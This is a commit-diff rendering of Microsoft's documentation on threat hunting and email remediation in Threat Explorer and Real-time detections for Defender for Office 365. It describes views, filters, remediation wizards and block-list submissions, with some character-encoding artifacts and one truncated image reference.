security Threat Explorer Threat Hunting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/threat-explorer-threat-hunting.md
- Title: Threat hunting in Threat Explorer and Real-time detections
- - NOCSH
---- Previously updated : 3/5/2024-
- - m365-security
- - tier1
-description: Learn about threat hunting and remediation in Microsoft Defender for Office 365 using Threat Explorer or Real-time detections in the Microsoft Defender portal.
--- seo-marvel-apr2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Threat hunting in Threat Explorer and Real-time detections in Microsoft Defender for Office 365
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on have **Explorer** (also known as **Threat Explorer**) or **Real-time detections**. These features are powerful, near real-time tools to help Security Operations (SecOps) teams investigate and respond to threats. For more information, see [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
-
-Threat Explorer or Real-time detections allow you to take the following actions:
--- See malware detected by Microsoft 365 security features.-- View phishing URL and click verdict data.-- Start an automated investigation and response process (Threat Explorer only).-- Investigate malicious email.-- And more.-
-Watch this short video to learn how to hunt and investigate email and collaboration-based threats using Defender for Office 365.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWyPRU]
-
-> [!TIP]
-> Advanced hunting in Microsoft Defender XDR supports an easy-to-use query builder that doesn't use the Kusto Query Language (KQL). For more information, see [Build queries using guided mode](/microsoft-365/security/defender/advanced-hunting-query-builder).
-
-The following information is available in this article:
--- [A general walkthrough of Threat Explorer and Real-time detections](#threat-explorer-and-real-time-detections-walkthrough)-- [The threat hunting experience using Threat Explorer and Real-time detections](#the-threat-hunting-experience-using-threat-explorer-and-real-time-detections)-- [Extended capabilities in Threat Explorer](#extended-capabilities-in-threat-explorer)-
-> [!TIP]
-> For email scenarios using Threat Explorer and Real-time detections, see the following articles:
->
-> - [Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-email-security.md)
-> - [Investigate malicious email that was delivered in Microsoft 365](threat-explorer-investigate-delivered-malicious-email.md)
->
-> If you're hunting for attacks based on malicious URLs embedded within QR codes, the **URL Source** filter value **QR code** in the **All email**, **Malware**, and **Phish** views in Threat Explorer or Real-time detections allows you to search for email message with URLs extracted from QR codes.
-
-## What do you need to know before you begin?
--- Threat Explorer is included in Defender for Office 365 Plan 2. Real-time detections is included in Defender for Office Plan 1:
- - The differences between Threat Explorer and Real-time detections are described in [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
- - The differences between Defender for Office 365 Plan 2 and Defender for Office Plan 1 are described in the [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
--- For permissions and licensing requirements for Threat Explorer and Real-time detections, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections).-
-## Threat Explorer and Real-time detections walkthrough
-
-Threat Explorer or Real-time detections is available in the **Email & collaboration** section in the Microsoft Defender portal at <https://security.microsoft.com>:
--- **Real-time detections** is available in _Defender for Office 365 Plan 1_. The **Real-time detections** page is available directly at <https://security.microsoft.com/realtimereportsv3>.-
- :::image type="content" source="../../media/te-rtd-select-real-time-detections.png" alt-text="Screenshot of the Real-time detections selection in the Email & collaboration section in the Microsoft Defender portal." lightbox="../../media/te-rtd-select-real-time-detections.png":::
--- **Threat Explorer** is available in _Defender for Office 365 Plan 2_. The **Explorer** page is available directly at <https://security.microsoft.com/threatexplorerv3>.-
- :::image type="content" source="../../media/te-rtd-select-threat-explorer.png" alt-text="Screenshot of the Explorer selection in the Email & collaboration section in the Microsoft Defender portal." lightbox="../../media/te-rtd-select-threat-explorer.png":::
-
-Threat Explorer contains the same information and capabilities as Real-time detections, but with the following additional features:
--- More views.-- More property filtering options, including the option to save queries.-- Threat hunting and remediation actions.-
-For more information about the differences between Defender for Office 365 Plan 1 and Plan 2, see the [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
-Use the tabs (views) at the top of the page to start your investigation.
-
-The available views in Threat Explorer and Real-time detections are described in the following table:
-
-|View|Threat<br/>Explorer|Real-time<br/>detections|Description|
-||::|::||
-|**All email**|Γ£ö||Default view for Threat Explorer. Information about all email messages sent by external users into your organization, or email sent between internal users in your organization.|
-|**Malware**|Γ£ö|Γ£ö|Default view for Real-time detections. Information about email messages that contain malware.|
-|**Phish**|Γ£ö|Γ£ö|Information about email messages that contain phishing threats.|
-|**Campaigns**|Γ£ö||Information about malicious email that Defender for Office 365 Plan 2 identified as part of a [coordinated phishing or malware campaign](campaigns.md).|
-|**Content malware**|Γ£ö|Γ£ö|Information about malicious files detected by the following features: <ul><li>[Built-in virus protection in SharePoint, OneDrive, and Microsoft Teams](anti-malware-protection-for-spo-odfb-teams-about.md)</li><li>[Safe Attachments for Sharepoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)</li></ul>|
-|**URL clicks**|Γ£ö||Information about user clicks on URLs in email messages, Teams messages, SharePoint files, and OneDrive files.|
-
-Use the date/time filter and the available filter properties in the view to refine the results:
--- For instructions to create filters, see [Property filters in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#property-filters-in-threat-explorer-and-real-time-detections).-- The available filter properties for each view are described in the following locations:
- - [Filterable properties in the All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-all-email-view-in-threat-explorer)
- - [Filterable properties in the Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-malware-view-in-threat-explorer-and-real-time-detections)
- - [Filterable properties in the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-phish-view-in-threat-explorer-and-real-time-detections)
- - [Filterable properties in the Campaigns view in Threat Explorer](campaigns.md#filters-on-the-campaigns-page)
- - [Filterable properties in the Content malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-content-malware-view-in-threat-explorer-and-real-time-detections)
- - [Filterable properties in the URL clicks view in Threat Explorer](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-url-clicks-view-in-threat-explorer)
-
-> [!TIP]
-> Remember to select **Refresh** after you create or update the filter. The filters affect the information in the chart and the details area of the view.
-
-You can think of refining the focus in Threat Explorer or Real-time detections as layers to make retracing your steps easier:
--- The first layer is the view you're using.-- The second later is the filters you're using in that view.-
-For example, you can retrace the steps you took to find a threat by recording your decisions like this: To find the issue in Threat Explorer, I used the **Malware** view and used a **Recipient** filter focus.
-
-Also, be sure to test your display options. Different audiences (for example, management) might react better or worse to different presentations of the same data.
-
-For example, in Threat Explorer the **All email** view, the **Email origin** and **Campaigns** views (tabs) are available in the details area at the bottom of the page:
--- For some audiences, the world map in the **Email origin** tab might do a better job of showing how widespread the detected threats are.-
- :::image type="content" source="../../media/te-rtd-all-email-view-details-area-email-origin-tab.png" alt-text="Screenshot of the world map in the Email origin view in the details area of the All email view in Threat Explorer." lightbox="../../media/te-rtd-all-email-view-details-area-email-origin-tab.png":::
--- Others might find the detailed information in the table in the **Campaigns** tab more useful to convey the information.-
- :::image type="content" source="../../media/te-rtd-all-email-view-details-area-campaign-tab.png" alt-text="Screenshot of the details table in the Campaign tab in the All email view in Threat Explorer." lightbox="../../media/te-rtd-all-email-view-details-area-campaign-tab.png":::
-
-You can use this information for the following results:
--- To show the need for security and protection.-- To later demonstrate the effectiveness of any actions.-
-### Email investigation
-
-In the **All email**, **Malware**, or **Phish** views in Threat Explorer or Real-time detections, email message results are shown in a table in the **Email** tab (view) of the details area below the chart.
-
-When you see a suspicious email message, click on the **Subject** value of an entry in the table. The details flyout that opens contains :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity** at the top of the flyout.
--
-The Email entity page pulls together everything you need to know about the message and its contents so you can determine whether the message is a threat. For more information, see [Email entity page overview](mdo-email-entity-page.md).
-
-### Email remediation
-
-After you determine that an email message is a threat, the next step is remediating the threat. You remediate the threat in Threat Explorer or Real-time detections using **Message actions** or :::image type="icon" source="../../media/m365-cc-sc-take-actions-icon.png" border="false"::: **Take action**.
-
-These actions are available in the **All email**, **Malware**, or **Phish** views in Threat Explorer or Real-time detections in the **Email** tab (view) of the details area below the chart:
--- Select one or more entries in the table by selecting the check box next to the first column. **Message actions** is available directly in the tab. For more information, see [Remediate using Message actions](#remediate-using-message-actions).-
- - **Threat Explorer**:
-
- :::image type="content" source="../../media/te-rtd-all-email-view-details-area-email-tab-message-selected-message-actions-threat-explorer.png" alt-text="Screenshot of the Email tab of the All email view in Threat Explorer showing a selected message and the available actions in Message actions." lightbox="../../media/te-rtd-all-email-view-details-area-email-tab-message-selected-message-actions-threat-explorer.png":::
-
- - **Real-time detections**:
-
- :::image type="content" source="../../media/te-rtd-all-email-view-details-area-email-tab-message-selected-message-actions-real-time-detections.png" alt-text="Screenshot of the Email tab of the All email view in Real-time detections showing a selected message and the available actions in Message actions." lightbox="../../media/te-rtd-all-email-view-details-area-email-tab-message-selected-message-actions-real-time-detections.png":::
--- Click on the **Subject** value of an entry in the table. The details flyout that opens contains :::image type="icon" source="../../media/m365-cc-sc-take-actions-icon.png" border="false"::: **Take action** at the top of the flyout. For more information, see [Remediate using Take action](#remediate-using-take-action).-
- :::image type="content" source="../../media/te-rtd-all-email-view-email-tab-details-area-subject-details-flyout-actions-only.png" alt-text="Screenshot of the actions available in the email details flyout after you select a Subject value in the Email tab of the details area in the All email view." lightbox="../../media/te-rtd-all-email-view-email-tab-details-area-subject-details-flyout-actions-only.png":::
-
-#### Remediate using Message actions
-
-In Threat Explorer and Real-time detections, selecting one or more messages enables **Message actions** on the **Email** tab (view) in the details area of the view:
--- In Threat Explorer, the available **Message actions** in the **All email**, **Malware**, and **Phish** views are described in the following list:-
- - **Move & delete**┬╣
- - Move to junk folder
- - Move to deleted items
- - Soft delete
- - Hard delete
- - Move to inbox
- - **Track & notify**
- - Trigger investigation
- - Investigate Sender
- - Investigate Recipient
- - Add to remediation
- - Contact recipients|
- - **Start new submission**
- - Submit to Microsoft
-
- ┬╣ The **Move & delete** actions require the **Search and Purge** role in [Email & collaboration permissions](mdo-portal-permissions.md). By default, this role is assigned only to the **Data Investigator** and **Organization Management** role groups. You can add users to those role groups, or you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.
--- In Real-time detectionsAvailable, the available **Message actions** in the **Malware** and **Phish** views are described in the following list:
- - **Start new submission**
- - Report clean
- - Report phishing
- - Report malware
- - Report spam
-
-##### Move & delete actions in Threat Explorer
-
-The following actions are available in the **Move & delete** category:
--- **Move to Junk folder**: Move the message to the Junk Email folder.-- **Move to Deleted Items**: Move the message to the Deleted items folder.-- **Soft delete**: Delete the message from the Deleted items folder (move to the Recoverable Items\Deletions folder). The message is recoverable by the user and admins.-- **Hard delete**: Purge the deleted message. Admins can recover hard deleted items using single-item recovery. For more information about hard deleted and soft deleted items, see [Soft-deleted and hard-deleted items](/compliance/assurance/assurance-exchange-online-data-deletion#soft-deleted-and-hard-deleted-items).-- **Move to Inbox**: Move the message to the Inbox.-
-> [!TIP]
-> Selecting **Move to Inbox** for message with the value **Quarantine** for the **Latest delivery location** property releases the message from quarantine.
-
-When you select an action, a remediation wizard opens:
-
-1. On the **Name your remediation** page, enter a unique, descriptive name and an optional description to track and identify the selected action, and then select **Next**.
-
-2. On the **Determine severity** page, configure the following settings:
- - **Severity**: Choose one of the following values:
- - **High** (this is the default value)
- - **Medium**
- - **Low**
- - **Status**: The value **Open** is selected, and you can't change it.
-
- When you're finished on the **Determine severity** page, select **Next**.
-
-3. On the **Review and trigger action** page, review your previous selections.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the impacted assets to a CSV file. By default, the filename is **Impacted assets.csv** located in the **Downloads** folder.
-
- Select **Back** or **Edit** to change your selections.
-
- When you're finished on the **Review and trigger action** page, select **Next**.
-
-4. The **Submit actions** page contains the following information:
- - The unique **Approval ID** value (for example, `d5f139`) and a link to the **History** tab of the **Action Center** at <https://security.microsoft.com/action-center/history>.
- - The following information about the email message:
- - **Date**
- - **Recipient**
- - **Subject**
- - **Status**
-
- When you're finished on the **Submit actions** page, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close**.
-
-##### Track & notify actions in Threat Explorer
--- **Trigger investigation**, **Investigate sender**, **Investigate recipient**: Selecting one of these actions immediately creates the investigation. Selecting **OK** in the confirmation dialog opens the **Investigations** page in the Defender portal at <https://security.microsoft.com/airinvestigation> to show the new investigation in the list.--- **Add to remediation**: Selecting this option opens the **Create a new remediation or add to an existing one** wizard:
- 1. On the **Create a remediation investigation** page, select one of the following values:
- - **Create a new remediation**: When you select **Next**, you go to the **Name your remediation** page.
- 1. On the **Name your remediation** page, enter a unique, descriptive name and an optional description to track and identify the selected action, and then select **Next**.
- 2. On the **Determine severity** page, select the **Severity** level (**High**, **Medium**, or **Low**; **High** is the default), and then select **Next**.
-
- - **Add to an existing remediation**: When you select **Next**, you go to the **Choose an existing remediation** page where you select the existing remediation from the **Submit emails to the following remediations** list, and then select **Next**.
-
- 2. On the **Review the scope of this remediation** page, review the **Date**, **Recipient**, **Subject**, and **Sender** information on the page, and then select **Next**.
- 3. The **Submit actions** page repeats the information from the previous page, and includes a link to the **Pending** tab of the **Action center** page at <https://security.microsoft.com/action-center/history>. When you're finished on the **Submit actions** page, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close**.
--- **Contact recipients**: Opens a new email message in the registered email client on your computer (for example, Microsoft Outlook) with the affected recipients in the Bcc box.-
-##### Start new submission actions in Threat Explorer
-
-When you select **Submit to Microsoft**, the **Submit to Microsoft for analysis** flyout opens. Select one of the following values:
--- **I've confirmed it's clean**: Select this value if you're sure that the message is clean. When you select **Next**, the following items are available on a new flyout that opens:
- - **Allow messages like this**: If you select this value, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options also appear:
- - **Remove allow entry after**: The default value is **30 days**, but you can also select **1 day**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Allow entry note**: Enter an optional note that contains additional information.
-
- When you're finished in this flyout, select **Submit**.
--- **It appears clean** or **It appears suspicious**: Select one of these values if you're unsure and you want a verdict from Microsoft, and then select **Submit**.--- **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select **Spam**, **Phish**, or **Malware** in the **Choose a category** section that appears. When you select **Next**, the following items are available on a new flyout that opens:
- - **Block all emails from this sender or domain**: This option is selected by default to add block entries to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. When this option is selected, the following options are also available:
- - Select **Sender** or **Domain** to block the specific email address or all email addresses in the domain. **Sender** is selected by default.
- - **Remove block entry after**: The default value is **30 days**, but you can also select **1 day**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Block entry note**: Enter an optional note that contains additional information.
-
- When you're finished in this flyout, select **Submit**.
-
-##### Start new submission actions in Real-time detections
-
-Selecting an action from the **Start new submission** category in Real-time detections results in the following options:
--- **Report clean**: In the **Submit message as clean to Microsoft** dialog that opens, configure the following settings:
- - **Allow emails with similar attributes (URL, sender, etc.)**: If you select this value, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options are also available:
- - **Remove allow entry after**: The default value is **30 days**, but you can also select **1 days**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Allow entry note**: Enter an optional note that contains additional information.
-
- When you're finished in the dialog, select **Submit**.
--- **Report phishing**: In the **Submit message as phishing to Microsoft** dialog that opens, configure the following options:
- - **Block all emails from this sender or domain**: If you select this value, block entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options are also available:
- - Select **Sender** or **Domain** to block the specific email address or all email addresses in the domain. **Sender** is selected by default.
- - **Remove block entry after**: The default value is **30 days**, but you can also select **1 days**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Block entry note**: Enter an optional note that contains additional information.
-
- When you're finished in the dialog, select **Submit**.
--- **Report malware**: In the **Submit message as malware to Microsoft** dialog that opens, configure the following options:
- - **Block all emails from this sender or domain**: If you select this value, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options are also available:
- - Select **Sender** or **Domain** to block the specific email address or all email addresses in the domain. **Sender** is selected by default.
- - **Remove block entry after**: The default value is **30 days**, but you can also select **1 days**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Block entry note**: Enter an optional note that contains additional information.
-
- When you're finished in the dialog, select **Submit**.
--- **Report spam**: In the **Submit message as spam to Microsoft** dialog that opens, configure the following options:
- - **Block all emails from this sender or domain**: If you select this value, block entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options are also available:
- - Select **Sender** or **Domain** to block the specific email address or all email addresses in the domain. **Sender** is selected by default.
- - **Remove block entry after**: The default value is **30 days**, but you can also select **1 days**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Block entry note**: Enter an optional note that contains additional information.
-
- When you're finished in the dialog, select **Submit**.
-
-#### Remediate using Take action
-
-After you click on the **Subject** value of an entry in the details table of the **Email** tab (view), selecting :::image type="icon" source="../../media/m365-cc-sc-take-actions-icon.png" border="false"::: **Take action** at the top of the flyout opens the **Take action** wizard in a new flyout.
--
-The available actions in the **Take action** wizard in Threat Explorer and Real-time detections are listed in the following table:
-
-|Action|Threat<br/>Explorer|Real-time<br/>Detections|
-||::|::|
-|**Move to mailbox folder**|Γ£ö┬╣||
-|**Submit to Microsoft for review**|Γ£ö|Γ£ö|
-|**Initiate automated investigation**|Γ£ö||
-|**Propose remediation**|Γ£ö|Γ£ö|
-
-┬╣ This action requires the **Search and Purge** role in [Email & collaboration permissions](mdo-portal-permissions.md). By default, this role is assigned only to the **Data Investigator** and **Organization Management** role groups. You can add users to those role groups, or you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.
-
-1. On the **Choose response actions** page, select one or more of the following options in the **Email message actions** section:
-
- - **Move to mailbox folder**: Select one of the available values that appear:
- - **Junk**: Move the message to the Junk Email folder.
- - **Inbox**: Move the message to the Inbox.
-
- If the message has the value **Quarantine** for the **Latest delivery location** property, selecting **Inbox** releases the message from quarantine as described on the page. Select one of the following values that appears:
-
- - **Release to one or more of the original recipients of the email**
- - **Release to all recipients**.
-
- - **Deleted items**: Move the message to the Deleted items folder.
- - **Soft deleted items**: Delete the message from the Deleted items folder (move to the Recoverable Items\Deletions folder). The message is recoverable by the user and admins.
- - **Hard deleted items**: Purge the deleted message. Admins can recover hard deleted items using single-item recovery. For more information about hard deleted and soft deleted items, see [Soft-deleted and hard-deleted items](/compliance/assurance/assurance-exchange-online-data-deletion#soft-deleted-and-hard-deleted-items).
-
- - **Submit to Microsoft for review**: Select one of the available values that appear:
- - **I've confirmed it's clean**: Select this value if you're sure that the message is clean. The following options appear:
- - **Allow messages like this**: If you select this value, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options also appear:
- - **Remove entry after**: The default value is **1 day**, but you can also select **7 days**, **30 days**, or a **Specific date** that's less than 30 days.
- - **Allow entry note**: Enter an optional note that contains additional information.
- - **It appears clean** or **It appears suspicious**: Select one of these values if you're unsure and you want a verdict from Microsoft.
- - **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
- - **Spam**
-
- After you select one of those values, a **Select entities to block** flyout opens where you can select one or more entities associated with the message (sender address, sender domain, URLs, or file attachments) to add as block entries to the Tenant Allow/Block list.
-
- After you select the items to block, select **Add to block rule** to close the **Select entities to block** flyout. Or, select no items and then select **Cancel**.
-
- Back on the **Choose response actions** page, select an expiration option for the block entries:
-
- - :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: **Expire on**: Select a date for block entries to expire.
- - :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **Never expire**
-
- The number of blocked entities is shown (for example, **4/4 entities to be blocked**). Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** to reopen the **Add to block rule** and make changes.
-
- - **Initiate automated investigation**: Threat Explorer only. Select one of the following values that appear:
- - **Investigate email**
- - **Investigate recipient**
- - **Investigate sender**
- - **Contact recipients**
-
- - **Propose remediation**: Select one of the following values that appear:
- - **Create new**: This value triggers a soft delete email pending action that needs to be approved by an admin in the Action center.
- - **Add to existing**: Use this value to apply actions to this email message from an existing remediation. In the **Submit email to the following remediations** box, select the existing remediation.
-
- When you're finished on the **Choose response actions** page, select **Next**.
-
-2. On the **Choose target entities** page, configure the following options:
-
- - **Name** and **Description**: Enter a unique, descriptive name and an optional description to track and identify the selected action.
-
- The rest of the page is a table that lists the affected assets. The table is organized by the following columns:
-
- - **Impacted asset**: The affected assets from the previous page. For example:
- - **Recipient email address**
- - **Entire tenant**
- - **Action**: The selected actions for the assets from the previous page. For example:
- - Values from **Submit to Microsoft for review**:
- - **Report as clean**
- - **Report**
- - **Report as malware**, **Report as spam**, or **Report as phishing**
- - **Block sender**
- - **Block sender domain**
- - **Block URL**
- - Values from **Initiate automated investigation**:
- - **Investigate email**
- - **Investigate recipient**
- - **Investigate sender**
- - **Contact recipients**
- - Values from **Propose remediation**:
- - **Create new remediation**
- - **Add to existing remediation**
- - **Target entity**: For example:
- - The **Network Message ID value** of the email message.
- - The blocked sender email address.
- - The blocked sender domain.
- - The blocked URL.
- - **Expires on**: Values exist only for allow or block entries in the Tenant/Allow Block List. For example:
- - **Never expire** for block entries.
- - The expiration date for allow or block entries.
- - **Scope**: Typically, this value is **MDO**.
-
- When you're finished on the **Choose target entities** page, select **Next**.
-
-3. On the **Review and submit** page, review your previous selections.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the impacted assets to a CSV file. By default, the filename is **Impacted assets.csv** located in the **Downloads** folder.
-
- Select **Back** to go back and change your selections.
-
- When you're finished on the **Review and submit** page, select **Submit**.
-
-## The threat hunting experience using Threat Explorer and Real-time detections
-
-Threat Explorer or Real-time detections helps your security operations team investigate and respond to threats efficiently. The following subsections explain how Threat Explorer and Real-time detections can help you find threats.
-
-### Threat hunting from Alerts
-
-The **Alerts** page is available in the Defender portal at **Incidents & alerts** \> **Alerts**, or directly at <https://security.microsoft.com/alerts>.
-
-Many alerts with the **Detection source** value **MDO** have the :::image type="icon" source="../../media/m365-cc-sc-show-trends-icon.png" border="false"::: **View messages in Explorer** action available at the top of the alert details flyout.
-
-The alert details flyout opens when you click anywhere on the alert other than the check box next to the first column. For example:
--- **A potentially malicious URL click was detected**-- **Admin submission result completed**-- **Email messages containing malicious URL removed after deliveryΓÇï**-- **Email messages removed after delivery**-- **Messages containing malicious entity not removed after delivery**-- **Phish not zapped because ZAP is disabled**--
-Selecting **View messages in Explorer** opens Threat Explorer in the **All email** view with the property filter **Alert ID** selected for the alert. The **Alert ID** value is a unique GUID value for the alert (for example, 89e00cdc-4312-7774-6000-08dc33a24419).
-
-**Alert ID** is a filterable property in the following views in Threat Explorer and Real-time detections:
--- [The **All email** view in Threat Explorer](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-all-email-view-in-threat-explorer).-- [The **Malware** view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-malware-view-in-threat-explorer-and-real-time-detections)-- [The **Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-phish-view-in-threat-explorer-and-real-time-detections)-
-In those views, **Alert ID** is available as a selectable column in the details area below the chart in the following tabs (views):
--- [The **Email** view for the details area of the **All email** view in Threat Explorer](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [The **Email** view for the details area of the **Malware** view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections)-- [The **Email** view for the details area of the **Phish** view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)-
-In the [email details flyout that opens when you click on a **Subject** value from one of the entries](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view), the **Alert ID** link is available in the **Email details** section of the flyout. Selecting the **Alert ID** link opens the **View alerts** page at <https://security.microsoft.com/viewalertsv2> with the alert selected and the details flyout open for the alert.
--
-### Tags in Threat Explorer
-
-In Defender for Office 365 Plan 2, if you use [user tags](user-tags-about.md) to mark high value targets accounts (for example, the **Priority account** tag) you can use those tags as filters. This method shows phishing attempts directed at high value target accounts during a specific time period. For more information about user tags, see [User tags](user-tags-about.md).
-
-User tags are available in the following locations in Threat Explorer:
--- **All email** view:
- - [As a filterable property](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-all-email-view-in-threat-explorer).
- - [An available column in the **Email** tab (view) of the details area](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer).
- - [The email details flyout from an entry in the **Email** tab (view)](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view)
-- **Malware** view:
- - [As a filterable property](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections).
- - [An available column in the **Email** tab (view) of the details area in the **Malware** view](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections).
- - [[The email details flyout from an entry in the **Email** tab (view)](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view)
-- **Phish** view:
- - [As a filterable property](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).
- - [An available column in the **Email** tab (view) of the details](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections).
- - [The email details flyout from an entry in the **Email** tab (view)](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view)
-- **URL clicks** view:
- - [As a filterable property](threat-explorer-real-time-detections-about.md#url-clicks-view-in-threat-explorer).
- - [An available column in the **Results** tab (view) of the details area in the **URL clicks** view](threat-explorer-real-time-detections-about.md#results-view-for-the-details-area-of-the-url-clicks-view-in-threat-explorer).
-
-### Threat information for email messages
-
-Pre-delivery and post-delivery actions on email messages are consolidated into a single record, regardless of the different post-delivery events that affected the message. For example:
--- [Zero-hour auto purge (ZAP)](zero-hour-auto-purge.md).-- Manual remediation (admin action).-- [Dynamic Delivery](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).-
-[The email details flyout from the **Email** tab (view)](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view) in the **All email**, **Malware**, or **Phish** views shows the associated threats and the corresponding detection technologies that are associated with the email message. A message can have zero, one, or multiple threats.
--- In the **Delivery details** section, the **Detection technology** property shows the detection technology that identified the threat. **Detection technology** is also available as a chart pivot or a column in the details table for many views in Threat Explorer and Real-time detections.--- The **URLs** section shows specific **Threat** information for any URLs in the message. For example, **Malware**, **Phish**, **Spam, or **None**.-
-> [!TIP]
-> Verdict analysis might not necessarily be tied to entities. The filters evaluate content and other details of an email message before assigning a verdict. For example, an email message might be classified as phishing or spam, but no URLs in the message are stamped with a phishing or spam verdict.
-
-Select :::image type="icon" source="../../medi).
--
-## Extended capabilities in Threat Explorer
-
-The following subsections describe filters that are exclusive to Threat Explorer.
-
-### Exchange mail flow rules (transport rules)
-
-To find messages that were affected by Exchange mail flow rules (also known as transport rules), you have the following options in the **All email**, **Malware**, and **Phish** views in Threat Explorer (not in Real-time detections):
--- **Exchange transport rule** is a selectable value for the **Primary override source**, **Override source**, and **Policy type** filterable properties.-- **Exchange transport rule** is a filterable property. You enter a partial text value for the name of the rule.-
-For more information, see the following links:
--- [All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#all-email-view-in-threat-explorer)-- [Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections)-- [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections)-
-The **Email** tab (view) for the details area of the **All email**, **Malware**, and **Phish** views in Threat Explorer also have **Exchange transport rule** as an available column that's not selected by default. This column shows the name of the transport rule. For more information, see the following links:
